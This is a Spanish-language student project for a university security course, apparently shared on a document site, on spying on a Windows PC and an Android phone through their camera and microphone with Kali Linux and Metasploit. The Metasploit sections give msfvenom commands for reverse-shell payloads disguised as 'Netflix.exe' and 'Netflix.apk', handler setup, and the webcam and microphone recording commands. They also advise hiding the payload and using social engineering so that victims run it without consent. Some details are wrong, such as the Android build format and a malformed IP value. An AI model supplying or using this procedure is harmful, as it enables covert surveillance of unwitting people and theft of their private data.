Está en la página 1de 17

Facultad de Ingeniería

Departamento de Ingeniería en Sistemas

ASIGNATURA: Seguridad Informática IS-811

CATEDRATICO: Rafael Edgardo Diaz Del Valle

ALUMNO: Luis Alejandro Morales Zelaya

CUENTA: 20161930074

PROYECTO I PARCIAL: Accediendo a micrófono y cámara


de un PC y un celular móvil

SECCION 2000

Acumulativo Primer Parcial

Tegucigalpa, Honduras 09-junio-2022


Contenido

INTRODUCCION .......................................................................................................................... 1
OBJETIVOS ................................................................................................................................... 2
Objetivo General ......................................................................................................................... 2
Objetivos Específicos: ................................................................................................................. 2
Marco Teórico ................................................................................................................................. 3
¿Qué es VirtualBox? ................................................................................................................... 3
Instala VirtualBox.................................................................................................................... 4
¿Qué es Kali Linux? .................................................................................................................... 4
Características de Kali Linux .................................................................................................. 5
DESCARGA E INSTALA KALI LINUX EN VIRTUALBOX ............................................. 6
Método de Hackeo ...................................................................................................................... 6
GENERACIÓN DEL EXPLOIT PARA WINDOWS ................................................................ 8
GENERACIÓN DEL EXPLOIT PARA ANDROID ................................................................. 9
Interacción con Metasploit. ..................................................................................................... 9
VARIABLES DE ESTUDIO ........................................................................................................ 11
DISEÑO DE LA INVESTIGACION ........................................................................................... 12
Estrategia ................................................................................................................................... 12
Plan de análisis .......................................................................................................................... 12
Metodología .............................................................................................................................. 12
DIAGNOSTICO ........................................................................................................................... 13
Situación actual ......................................................................................................................... 13
Medición de la situación actual ................................................................................................. 13
Interpretación de los resultados ................................................................................................. 13
CONCLUSIONES ........................................................................................................................ 14
BIBLIOGRAFÍA .......................................................................................................................... 15
INTRODUCCION

En el presente documento se explicará detalladamente acerca de la implementación de Kali

Linux mediante una máquina virtual (VirtualBox) y algunas de sus herramientas que nos

permiten controlar algunas funciones de un ordenador y hasta un celular móvil mediante un

archivo infectado sin que el propietario del mismo tenga el consentimiento de lo que en realidad

está sucediendo.

Hoy en día, tenemos que tener mucho cuidado al momento de ejecutar un archivo o enlace, ya

que, de esta manera estamos dando la autorización de que se ejecute cierto software del cual

desconocemos las funciones que se están corriendo en nuestra PC o dispositivo móvil las cuales

conlleva un gran problema de nuestra privacidad.

Es necesario tener el conocimiento que ningún sistema es seguro y esto lo trataremos de

demostrar accediendo a la cámara y micrófono de una PC (Windows 10 home) y un celular

móvil (Android 8.1.0). En estos casos, la ingeniería social juega un papel muy importante, ya

que, en ocasiones es necesario persuadir a un individuo para que pueda instalar una aplicación.

1
OBJETIVOS

Objetivo General:
➢ Demostrar la forma en que podemos acceder a la cámara y micrófono de un PC y de

un celular móvil.

Objetivos Específicos:

➢ Explicar la forma en que podemos implementar Kali Linux mediante una máquina

virtual (VirtualBox).

➢ Conocer la gran vulnerabilidad que tenemos al momento de hacer uso de un

sistema.

➢ Determinar cuáles son los procesos y como estos se desarrollan poder acceder a la

cámara y micrófono mediante una serie de comandos.

2
¿Qué es VirtualBox?

VirtualBox es una aplicación que sirve para hacer máquinas virtuales con instalaciones de

sistemas operativos. Esto quiere decir que, si tienes un ordenador con Windows, GNU/Linux

o incluso macOS, puedes crear una máquina virtual con cualquier otro sistema operativo para

utilizarlo dentro del que estés usando. (Yubal, 2020).

En otras palabras, esto te va a permitir instalar otros sistemas operativos o el mismo que

ya tienes dentro de tu ordenador. El primer caso te va a servir para probar las aplicaciones de

otro sistema operativo para no tener que estar haciendo particiones o el proceso de instalar

Linux junto a Windows 10. No es una experiencia tan nativa y buena como tener instalado el

sistema operativo en el ordenador, pero te va a servir para hacer pruebas puntuales.

En cuanto a instalar tú mismo sistema operativo, pero en una máquina virtual, también

puede llegar a ser útil en algunos ámbitos. Por ejemplo, si quieres hacer algún cambio

profundo en la configuración o instalar alguna aplicación peligrosa, ambas cosas que podrían

llevar a que tu Windows falle, puedes hacerlo primero en este ámbito controlado de la

máquina virtual para que cualquier cambio no repercuta en tu ordenador.

A la hora de instalar este otro sistema operativo dentro del que ya tienes mediante una

máquina virtual, tendrás que reservar parte de tu disco duro a esta otra máquina. Todo se hará

en el proceso de creación, y luego podrás reutilizar estos discos duros o crear otros nuevos

para otras máquinas virtuales, pudiendo tener varias a las que ir recurriendo. (Yubal, 2020)

3
Instala VirtualBox

¿Qué es Kali Linux?

Es una de las distros de hacking ético más populares y utilizadas en todo el mundo. Esta

distro está basada en Debian y mantenida por Offensive Security Ltd. Aunque no es una de las

más completas en cuanto a número de programas, sus desarrolladores se encargan de que no

haya herramientas repetidas (como ocurre en otras distros similares), además de ofrecer siempre

las últimas versiones de esta distro (Ruben, 2020).

Además de las aplicaciones que están incluidas en Kali Linux, esta distribución ofrece soporte

para un gran abanico de dispositivos inalámbricos con los que trabajar, así como una amplia

variedad de plataformas como ARM, Raspberry Pi, Chromebook, etc.

Instalación y prueba de Kali Linux

Se puede usar Kali Linux desde un Live USB como cualquier otra distro Linux y arrancarla

desde un USB con las distintas ISOs adaptadas para cada una de las plataformas, instalarla en

4
una máquina virtual utilizando alguna de las imágenes preparadas para usarse en VirtualBox o

VMWare, o instalarlo de una forma fija en una partición de tu disco duro desde un disco de

instalación. Sea cual sea su elección, lo que sí se recomienda por su propia seguridad, es no

descargar Kali Linux de ningún sitio que no sea de su página oficial.

Características de Kali Linux

Esta distro de hacking ético está basada en Debian. Esto significa que los usuarios que opten

por ella tendrán una base conocida y con excelente soporte y mantenimiento. La personalización

es también uno de los puntos fuertes de esta alternativa, así como la posibilidad de usarla en el

idioma que queramos.

Dentro de Kali podemos encontrar un total de 600 aplicaciones de hacking y seguridad, entre

las que podemos destacar:

• Nmap: software para el escaneo de puertos, útil para buscar vulnerabilidades y puntos de

ataque.

• Wireshark: herramienta para poder analizar todo el tráfico de la red, capturar e inyectar

paquetes.

• John the Ripper: programa para romper contraseñas, tanto por fuerza bruta como

mediante debilidades.

• Aircrack-ng: software para medir la seguridad de una red Wi-Fi y robar contraseñas.

• THC Hydra: programa para llevar a cabo ataques de fuerza bruta a distintos protocolos,

como telnet, FTP, HTTP, HTTPS y SMB.

• Nessus: software para escaneo remoto de redes y sistemas, para buscar vulnerabilidades.

• Metasploit: kit de exploits públicos para explotar vulnerabilidades en ordenadores.

5
DESCARGA E INSTALA KALI LINUX EN VIRTUALBOX

Método de Hackeo

MetaSploit, tomar control de equipos remotos

MetaSploit es una suite o conjunto de programas en realidad. Está diseñada para explotar las

vulnerabilidades de los equipos y es sin duda el programa más usado por los mejores hackers del

mundo. Dentro de MetaSploit, disponemos de multitud de herramientas y programas para

ejecutar en las diferentes vulnerabilidades de cada equipo, a cada una de estas aplicaciones se le

llama sploit.

Primero se arranca Kali Linux y se configura la red con una IP estática dentro del rango de

red de la víctima con sudo nano /etc/networw/interfaces.

6
Cada vez que se haga modificaciones de red, se debe reiniciar. Si se hace un ifconfig y siguesin

asignarse la IP que se le ha puesto, se reinicia Kali.

Un troyano o puerta trasera puede dar acceso a la máquina de destino de forma remota. Todos

lo sabemos, no profundizaremos en explicar qué es un troyano. Aquí vamos a usar el troyano

reverse_tcp de metasploit. Este es un malware especialmente diseñado que establece una

conexión remota a la máquina del cracker a través del protocolo de control de transición desde la

máquina víctima. Esto le permite al cracker penetrar en la máquina y tomar el control total sobre

ella.

Metasploit Framework, es una de las herramientas más utilizadas por los auditores de

seguridad. Incluye una gran colección de exploits, aparte de proporcionale un entorno de

desarollo para los propios exploits. esta herramienta también es muy utilizada por los auditores

de seguridad debido a su fácil implementación con otras herramientas como nmap, escaners de

vulneravilidades, etc. Metasploit Framework es una infraestructura que puede ser personalizada

y utilizada para necesidades específicas. también hay que mencionar que Metasploit Framework

está respaldada por una comunidad de más de 200.000 usuarios, sin contar que esta herramienta

también está respaldad por una empresa (Jorge, 2018).

7
GENERACIÓN DEL EXPLOIT PARA WINDOWS

Para generar el exploit basta con ejecutar el siguiente comando en su consola GNU/Linux:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104/6 LPORT=4444 -f


exe -o $HOME/Netflix.exe

Interacción con metasploit.

Una vez generado el exploit realizaremos los siguientes pasos, cuando hayamos terminado

debemos buscar la manera de que se ejecute en el sistema de la víctima, para lograrlo puedes

usar técnicas cómo ingeniería social. No se recomienda enviar el exploit tal cual, hay que

camuflarlo, añadirle encoders entre otras cosas para tratar de persuadir al usuario.

1. Abrimos la consola de metasploit.

➢ sudo msfconsole

2. Usamos Handler

➢ use multi/handler

3. Configuramos el Payload.

➢ msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

4. Configuramos el puerto local.

➢ msf exploit(handler) > set LPORT 4444

5. Configuramos la ip local.

➢ msf exploit(handler) > set LHOST "Nuestra IP local en Kali Linux"

8
6. Ejecutamos el exploit.

➢ msf exploit(handler) > exploit

7. Vemos las opciones que tenemos

➢ meterpreter > help

8. Seleccionamos la opción de acceder a la cámara o al micrófono

➢ meterpreter > webcam_stream

➢ meterpreter >record_mic

9. Payload ejecutado.

Una vez que la víctima haya ejecutado nuestro archivo malicioso obtendremos una sesión de

meterpreter cómo se puede ver a continuación.

➢ msf exploit(multi/handler) > exploit

GENERACIÓN DEL EXPLOIT PARA ANDROID

Para generar el exploit basta con ejecutar el siguiente comando en su consola GNU/Linux:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104/6 LPORT=4444 -f exe


-o $HOME/Netflix.apk

Interacción con Metasploit.

Una vez generado el exploit realizaremos los siguientes pasos, cuando hayamos terminado

debemos buscar la manera de que se ejecute en el sistema de la víctima, para lograrlo puedes

9
usar técnicas cómo ingeniería social. No se recomienda enviar el exploit tal cual, hay que

camuflarlo, añadirle encoders entre otras cosas.

1. Abrimos la consola de metasploit.

➢ sudo msfconsole

2. Usamos Handler

➢ use multi/handler

3. Configuramos el Payload.

➢ msf exploit(handler) > set payload android/meterpreter/reverse_tcp

4. Configuramos el puerto local.

➢ msf exploit(handler) > set LPORT 4444

5. Configuramos la ip local.

➢ msf exploit(handler) > set LHOST "Nuestra IP local en Kali Linux"

6. Ejecutamos el exploit.

➢ msf exploit(handler) > exploit

7. Vemos las opciones que tenemos

➢ meterpreter > help

8. Seleccionamos la opción de acceder a la cámara o al micrófono

➢ meterpreter > webcam_stream

➢ meterpreter >record_mic

10
9. Payload ejecutado.

Una vez que la víctima haya ejecutado nuestro archivo malicioso obtendremos una sesión de

meterpreter cómo se puede ver a continuación.

➢ msf exploit(multi/handler) > exploit

VARIABLES DE ESTUDIO

Ingeniería social: Se puede definir como un conjunto de técnicas utilizadas por los

ciberdelincuentes para ganar nuestra confianza y que hagamos algo bajo su manipulación y

engaño, como puede ser ejecutar un programa malicioso y que le permita el acceso a nuestra

información.

Acceder a Información: Debemos de ser consientes lo fácil que podemos caer en una trampa

aceptando algún enlace o ingresando alguna pagina desconocida. En esta ocasión logramos

acceder a la cámara y micrófono de un Pc y de un celular móvil.

Vulnerabilidades: Todo sistema tiene defectos de los cuales se aprovechan algunos

individuos y acceden a la información personal de una persona y en ocasiones piden dinero para

no exponer parte de la documentación que nosotros creíamos que estaba a salvo.

11
DISEÑO DE LA INVESTIGACION

Estrategia

Se realizaron diferentes tipos de búsquedas mediante distintas páginas web asociadas a las

herramientas que tiene Kali Linux y a las vulnerabilidades que tenemos al momento de usar un

sistema ya sea en un ordenador o un celular móvil, artículos en internet de empresas

reconocidas como el caso de ORACLE VM, buscando lo más relevante con respecto a dicho

tema, incluyendo también la búsqueda de videos asociados al tema, para enriquecer más la

información y especificar cada uno de ellos.

Plan de análisis

Mediante la información recopilada en diferentes documentos y sitios web, se logró

identificar los temas principales como ser: herramienta de VirtualBox cómo funciona y como

configurar Kali Linux y además como estamos expuestos a diferentes tipos de ataques, también

algunos aspectos generales que debemos saber sobre la ingeniería social y que fallamos en

aceptar alguna propuesta para caer en una trampa.

Metodología

La metodología está basada en diferentes búsquedas mediante:

1. Investigación en sitios web y descarga de VirtualBox y la ISO de Kali Linux

2. Artículos y foros encontrados en internet

3. Documentales sobre como acceder al micrófono y cámara de un PC y un celular móvil.

4. Vídeos relacionados con las vulnerabilidades que tenemos al utilizar un sistema.

12
DIAGNOSTICO

Situación actual

Desconocía la facilidad que existe de que otros individuos podían acceder a mi información

de una forma discreta y sin tener mi consentimiento. Además, no conocía el gran papel que juega

la ingeniería social al momento de acceder e instalar ciertos softwares en nuestros dispositivos de

manera inconsciente.

Medición de la situación actual

Mediante la investigación logré conocer más a fondo sobre la ingeniería social y las

herramientas que podemos aprovechar de Kali Linux, También logre comprender la forma en

que los individuos que buscan aprovechar de nosotros manipulando psicológicamente a las

personas para que compartan información confidencial o hagan acciones inseguras, mediante

diferentes técnicas como el uso de las redes sociales, correo electrónico, necesarias para vulnerar

la información, creando escenarios para lograr que la víctima les brinde acceso a su ordenador y

de los celulares móviles.

Interpretación de los resultados

Nos damos cuenta de la gran vulnerabilidad que tenemos al momento de utilizar un ordenador

o un celular móvil. Lo fácil que es acceder al micrófono y la cámara e incluso poder manipular

muchas más funciones de estos dispositivos sin necesidad que nos demos cuenta que están

robando nuestra información personal. Debemos de estar alerta en todo momento y no acceder a

paginas poco confiables o instalando aplicaciones sospechosas que nos pueden ocasionar severos

problemas con nuestra privacidad.

13
CONCLUSIONES

➢ Como consecuencia de lo expuesto en el informe, conocimos qué es y para qué sirve

Kali Linux virtualizado (VirtualBox) y como lo podemos implementar para poder

acceder a un sistema operativo que presente vulnerabilidades y la gran cantidad de

herramientas que nos ofrece Kali Linux para la realización de otras funciones que

creíamos imposibles.

➢ En conclusión, tuvimos que realizar una investigación a fondo para poder lograr el

acceso a Windows 10 el cual genero varios problemas, pero esto se debía a que teníamos

activado el antivirus que este sistema operativo trae por defecto (Windows Defender).

➢ Finalmente, comprendimos que Kali Linux es una distribución orientada a la

seguridad informática, por lo que con ella podrás ejecutar todo tipo de herramientas con

las que poner a prueba la seguridad de tus sistemas y redes.

➢ Conocimos lo fácil que es acceder a las funciones de un ordenador o celular móvil

implementando un poco de ingeniería social esto se vuelve aún más fácil. Es por ello que

se recomienda evitar acceder a estos enlaces, paginas desconocidas e incluso instalar un

software malicioso en nuestros dispositivos

14
BIBLIOGRAFÍA

Jorge, D. (12 de septiembre de 2018). HARDSOFT SECURITY. Recuperado el 08 de junio de

2022, de https://hardsoftsecurity.es/index.php/2018/09/18/que-es-metasploit-framework/

Ruben, V. (03 de Marzo de 2020). SoftZone. Recuperado el 08 de junio de 2022, de

https://www.softzone.es/programas/linux/kali-linux/

Yubal, F. (01 de junio de 2020). XATAKA. Recuperado el 08 de junio de 2022, de

https://www.xataka.com/basics/virtualbox-que-como-usarlo-para-crear-maquina-virtual-

windows-u-otro-sistema-operativo

15

También podría gustarte